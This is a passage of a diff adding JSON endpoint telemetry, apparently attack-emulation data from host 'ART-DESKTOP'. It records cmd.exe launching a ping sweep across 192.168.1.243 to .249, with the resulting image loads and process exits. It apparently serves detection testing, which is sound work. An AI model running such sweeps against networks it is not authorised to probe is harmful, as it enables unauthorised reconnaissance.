"{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "process", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573181830000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.243", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4796, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573181980000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "event_type": "process", + "pid": 4796, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573186990000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.244", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5296, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573187130000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187140000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187300000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573187300000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "event_type": "process", + "pid": 5296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573191830000, + "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.245", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5560, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573191980000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "event_type": "process", + "pid": 5560, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573196990000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.246", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3320, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197140000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197300000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197300000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573197300000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "event_type": "process", + "pid": 3320, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573201990000, + "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.247", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8156, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573202140000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "event_type": "process", + "pid": 8156, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573206830000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.248", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5364, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573206980000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "event_type": "process", + "pid": 5364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573211830000, + "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.249", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7624, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7624, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573211980000, + "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" + }, + { + "event_type": "image_load", + "image_name": 